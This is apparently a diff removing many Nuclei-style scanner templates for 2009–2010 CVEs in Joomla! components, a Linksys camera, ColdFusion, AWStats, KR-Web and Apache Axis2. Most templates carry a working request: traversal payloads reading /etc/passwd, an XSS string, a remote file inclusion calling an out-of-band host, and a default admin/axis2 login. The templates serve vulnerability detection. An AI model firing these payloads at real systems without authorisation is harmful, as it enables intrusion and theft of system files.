# Enhanced by mp on 2022/07/06
|
|
@ -1,36 +0,0 @@
|
|||
id: CVE-2009-1558
|
||||
|
||||
info:
|
||||
name: Cisco Linksys WVC54GCA 1.00R22/1.00R24 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Cisco Linksys WVC54GCA 1.00R22/1.00R24 is susceptible to local file inclusion in adm/file.cgi because it allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/32954
|
||||
- https://web.archive.org/web/20210119151410/http://www.securityfocus.com/bid/34713
|
||||
- http://www.vupen.com/english/advisories/2009/1173
|
||||
- http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-1558
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cve-id: CVE-2009-1558
|
||||
cwe-id: CWE-22
|
||||
tags: cve,iot,linksys,camera,traversal,cve2009,lfi,cisco,firmware,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/06
|
|
@ -1,45 +0,0 @@
|
|||
id: CVE-2009-1872
|
||||
|
||||
info:
|
||||
name: Adobe Coldfusion <=8.0.1 - Cross-Site Scripting
|
||||
author: princechaddha
|
||||
severity: medium
|
||||
description: Adobe ColdFusion Server 8.0.1 and earlier contain multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.
|
||||
reference:
|
||||
- https://web.archive.org/web/20201208121904/https://www.securityfocus.com/archive/1/505803/100/0/threaded
|
||||
- https://www.tenable.com/cve/CVE-2009-1872
|
||||
- http://www.adobe.com/support/security/bulletins/apsb09-12.html
|
||||
- http://www.dsecrg.com/pages/vul/show.php?id=122
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-1872
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
|
||||
cve-id: CVE-2009-1872
|
||||
cwe-id: CWE-79
|
||||
cvss-score: 4.3
|
||||
metadata:
|
||||
shodan-query: http.component:"Adobe ColdFusion"
|
||||
verified: "true"
|
||||
tags: cve,cve2009,adobe,xss,coldfusion,tenable
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/08/12
|
|
@ -1,36 +0,0 @@
|
|||
id: CVE-2009-2015
|
||||
|
||||
info:
|
||||
name: Joomla! MooFAQ 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion).
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/8898
|
||||
- http://web.archive.org/web/20210121191105/https://www.securityfocus.com/bid/35259/
|
||||
- http://www.vupen.com/english/advisories/2009/1530
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-2015
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cve-id: CVE-2009-2015
|
||||
cwe-id: CWE-22
|
||||
tags: joomla,lfi,edb,cve,cve2009
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/06
|
|
@ -1,36 +0,0 @@
|
|||
id: CVE-2009-2100
|
||||
|
||||
info:
|
||||
name: Joomla! JoomlaPraise Projectfork 2.0.10 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Joomla! JoomlaPraise Projectfork (com_projectfork) 2.0.10 allows remote attackers to read arbitrary files via local file inclusion in the section parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/8946
|
||||
- http://web.archive.org/web/20210121191226/https://www.securityfocus.com/bid/35378/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-2100
|
||||
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cve-id: CVE-2009-2100
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2009,joomla,lfi,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_projectfork§ion=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/06
|
|
@ -1,36 +0,0 @@
|
|||
id: CVE-2009-3053
|
||||
|
||||
info:
|
||||
name: Joomla! Agora 3.0.0b - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/9564
|
||||
- https://web.archive.org/web/20210120183330/https://www.securityfocus.com/bid/36207/
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/52964
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-3053
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cve-id: CVE-2009-3053
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2009,joomla,lfi,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/06
|
|
@ -1,36 +0,0 @@
|
|||
id: CVE-2009-3318
|
||||
|
||||
info:
|
||||
name: Joomla! Roland Breedveld Album 1.14 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Joomla! Roland Breedveld Album 1.14 (com_album) is susceptible to local file inclusion because it allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/9706
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-3318
|
||||
- https://web.archive.org/web/20210121192413/https://www.securityfocus.com/bid/36441/
|
||||
- http://www.exploit-db.com/exploits/9706
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
|
||||
cve-id: CVE-2009-3318
|
||||
cwe-id: CWE-22
|
||||
cvss-score: 7.5
|
||||
tags: joomla,lfi,edb,cve,cve2009
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/06/08
|
|
@ -1,36 +0,0 @@
|
|||
id: CVE-2009-4202
|
||||
|
||||
info:
|
||||
name: Joomla! Omilen Photo Gallery 0.5b - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Joomla! Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/8870
|
||||
- http://www.vupen.com/english/advisories/2009/1494
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-4202
|
||||
- http://web.archive.org/web/20210121191031/https://www.securityfocus.com/bid/35201/
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2009-4202
|
||||
cwe-id: CWE-22
|
||||
tags: cve2009,joomla,lfi,photo,edb,cve
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/06/08
|
|
@ -1,36 +0,0 @@
|
|||
id: CVE-2009-4223
|
||||
|
||||
info:
|
||||
name: KR-Web <=1.1b2 - Remote File Inclusion
|
||||
author: geeknik
|
||||
severity: high
|
||||
description: KR-Web 1.1b2 and prior contain a remote file inclusion vulnerability via adm/krgourl.php, which allows remote attackers to execute arbitrary PHP code via a URL in the DOCUMENT_ROOT parameter.
|
||||
reference:
|
||||
- https://sourceforge.net/projects/krw/
|
||||
- https://www.exploit-db.com/exploits/10216
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/54395
|
||||
- http://www.exploit-db.com/exploits/10216
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-4223
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
|
||||
cve-id: CVE-2009-4223
|
||||
cwe-id: CWE-94
|
||||
cvss-score: 7.5
|
||||
tags: cve,cve2009,krweb,rfi,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "http"
|
||||
|
||||
# Enhanced by mp on 2022/06/06
|
|
@ -1,37 +0,0 @@
|
|||
id: CVE-2009-4679
|
||||
|
||||
info:
|
||||
name: Joomla! Portfolio Nexus - Remote File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: |
|
||||
Joomla! Portfolio Nexus 1.5 contains a remote file inclusion vulnerability in the inertialFATE iF (com_if_nexus) component that allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/33440
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-4679
|
||||
- http://web.archive.org/web/20140722130146/http://secunia.com/advisories/37760/
|
||||
- http://www.exploit-db.com/exploits/10754
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
|
||||
cve-id: CVE-2009-4679
|
||||
cwe-id: CWE-22
|
||||
cvss-score: 7.5
|
||||
tags: cve,cve2009,joomla,lfi,nexus,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/06/08
|
|
@ -1,31 +0,0 @@
|
|||
id: CVE-2009-5020
|
||||
|
||||
info:
|
||||
name: AWStats < 6.95 - Open Redirect
|
||||
author: pdteam
|
||||
severity: medium
|
||||
description: An open redirect vulnerability in awredir.pl in AWStats < 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-5020
|
||||
- http://awstats.sourceforge.net/docs/awstats_changelog.txt
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2009-5020
|
||||
cwe-id: CWE-601
|
||||
tags: cve,cve2009,redirect,awstats
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/awstats/awredir.pl?url=interact.sh'
|
||||
- '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=interact.sh'
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
|
||||
|
||||
# Enhanced by mp on 2022/02/13
|
|
@ -1,33 +0,0 @@
|
|||
id: CVE-2009-5114
|
||||
|
||||
info:
|
||||
name: WebGlimpse 2.18.7 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/36994
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-5114
|
||||
- http://websecurity.com.ua/2628/
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/74321
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
||||
cve-id: CVE-2009-5114
|
||||
cwe-id: CWE-22
|
||||
cvss-score: 5.0
|
||||
tags: edb,cve,cve2009,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
|
@ -1,33 +0,0 @@
|
|||
id: CVE-2010-0157
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_biblestudy - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: A directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/10943
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-0157
|
||||
- http://web.archive.org/web/20151023032409/http://secunia.com/advisories/37896/
|
||||
- http://packetstormsecurity.org/1001-exploits/joomlabiblestudy-lfi.txt
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
|
||||
cve-id: CVE-2010-0157
|
||||
cwe-id: CWE-22
|
||||
cvss-score: 7.5
|
||||
tags: cve,cve2010,joomla,lfi,edb,packetstorm
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
|
@ -1,56 +0,0 @@
|
|||
id: CVE-2010-0219
|
||||
|
||||
info:
|
||||
name: Apache Axis2 Default Login
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-0219
|
||||
- https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html
|
||||
- http://www.rapid7.com/security-center/advisories/R7-0037.jsp
|
||||
- http://www.vupen.com/english/advisories/2010/2673
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
|
||||
cvss-score: 10
|
||||
cve-id: CVE-2010-0219
|
||||
cwe-id: CWE-255
|
||||
metadata:
|
||||
shodan-query: http.html:"Apache Axis"
|
||||
tags: cve,cve2010,axis,apache,default-login,axis2
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /axis2-admin/login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
loginUsername={{username}}&loginPassword={{password}}
|
||||
|
||||
- |
|
||||
POST /axis2/axis2-admin/login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
userName={{username}}&password={{password}}&submit=+Login+
|
||||
|
||||
payloads:
|
||||
username:
|
||||
- admin
|
||||
password:
|
||||
- axis2
|
||||
attack: pitchfork
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "<h1>Welcome to Axis2 Web Admin Module !!</h1>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/02
|
|
@ -1,33 +0,0 @@
|
|||
id: CVE-2010-0467
|
||||
|
||||
info:
|
||||
name: Joomla! Component CCNewsLetter - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: A directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11282
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-0467
|
||||
- http://web.archive.org/web/20210121194037/https://www.securityfocus.com/bid/37987/
|
||||
- http://www.chillcreations.com/en/blog/ccnewsletter-joomla-newsletter/ccnewsletter-106-security-release.html
|
||||
remediation: Apply all relevant security patches and upgrades.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
|
||||
cvss-score: 5.8
|
||||
cve-id: CVE-2010-0467
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2010,joomla,lfi,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
|
@ -1,34 +0,0 @@
|
|||
id: CVE-2010-0696
|
||||
|
||||
info:
|
||||
name: Joomla! Component Jw_allVideos - Arbitrary File Retrieval
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11447
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-0696
|
||||
- http://web.archive.org/web/20140805102632/http://secunia.com/advisories/38587/
|
||||
- http://www.joomlaworks.gr/content/view/77/34/
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
||||
cvss-score: 5
|
||||
cve-id: CVE-2010-0696
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2010,joomla,lfi,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/02/13
|
|
@ -1,33 +0,0 @@
|
|||
id: CVE-2010-0759
|
||||
|
||||
info:
|
||||
name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: A directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11498
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-0759
|
||||
- http://web.archive.org/web/20151104183037/http://secunia.com/advisories/38637/
|
||||
- http://web.archive.org/web/20210121194344/https://www.securityfocus.com/bid/38296/
|
||||
remediation: Upgrade to a supported version.
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2010-0759
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2010,joomla,lfi,plugin,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
|
@ -1,32 +0,0 @@
|
|||
id: CVE-2010-0942
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_jvideodirect - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11089
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-0942
|
||||
- http://packetstormsecurity.org/1001-exploits/joomlajvideodirect-traversal.txt
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
||||
cvss-score: 5
|
||||
cve-id: CVE-2010-0942
|
||||
cwe-id: CWE-22
|
||||
tags: cve2010,joomla,lfi,edb,packetstorm,cve
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
|
@ -1,33 +0,0 @@
|
|||
id: CVE-2010-0943
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_jashowcase - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11090
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-0943
|
||||
- http://web.archive.org/web/20210121193737/https://www.securityfocus.com/bid/37692/
|
||||
- http://web.archive.org/web/20140724215426/http://secunia.com/advisories/33486/
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
||||
cvss-score: 5
|
||||
cve-id: CVE-2010-0943
|
||||
cwe-id: CWE-22
|
||||
tags: cve2010,joomla,lfi,edb,cve
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/30
|
|
@ -1,33 +0,0 @@
|
|||
id: CVE-2010-0944
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_jcollection - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11088
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-0944
|
||||
- http://packetstormsecurity.org/1001-exploits/joomlajcollection-traversal.txt
|
||||
- http://www.exploit-db.com/exploits/11088
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
||||
cvss-score: 5
|
||||
cve-id: CVE-2010-0944
|
||||
cwe-id: CWE-22
|
||||
tags: cve2010,joomla,lfi,edb,packetstorm,cve
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
|
@ -1,33 +0,0 @@
|
|||
id: CVE-2010-0972
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11738
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-0972
|
||||
- http://web.archive.org/web/20140804152652/http://secunia.com/advisories/38925/
|
||||
- http://www.exploit-db.com/exploits/11738
|
||||
remediation: Apply all relevant security patches and product upgrades.
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2010-0972
|
||||
cwe-id: CWE-22
|
||||
tags: edb,cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# Enhanced by mp on 2022/02/13
|
|
@ -1,33 +0,0 @@
|
|||
id: CVE-2010-0982
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_cartweberp - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/10942
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-0982
|
||||
- http://web.archive.org/web/20210121193625/https://www.securityfocus.com/bid/37581/
|
||||
